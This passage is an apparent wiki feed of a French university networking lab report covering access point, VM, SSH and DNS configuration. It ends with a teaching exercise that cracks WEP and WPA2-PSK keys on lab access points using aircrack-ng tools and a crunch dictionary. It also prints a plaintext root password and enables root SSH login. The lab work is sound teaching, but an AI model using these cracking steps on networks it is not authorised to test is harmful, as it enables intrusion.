= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
[En cours]&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'access point connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi :&lt;br /&gt;
Source : https://www.cisco.com/en/US/docs/routers/access/800/850/software/configuration/guide/wireless.html&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en route (mdp : Cisco si par défaut)&lt;br /&gt;
 int sh =&amp;gt; pour trouver le nom de l'interface radio principale&lt;br /&gt;
 conf t =&amp;gt; Passer en mode configuration&lt;br /&gt;
 int dot11radio0 =&amp;gt; On se place sur la première interface radio de l'AP&lt;br /&gt;
 broadcast-key vlan 42 change 45&lt;br /&gt;
 broadcast-key vlan 1 change 45 =&amp;gt; Rafraichissement de la clé d'encryption toutes les 45 secondes &lt;br /&gt;
 ssid e304 =&amp;gt; Condiguration du SSID&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56734</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56734"/>
				<updated>2021-11-29T18:04:32Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
Configuration du SSH &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
Configuration du DNS :&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net d'IP 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.site&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
         allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
&lt;br /&gt;
 [prendre fichier dans gandi.net &amp;gt; DNS Records &amp;gt; Text]&lt;br /&gt;
&lt;br /&gt;
[esquisse à compléter]&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56732</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56732"/>
				<updated>2021-11-29T18:01:39Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
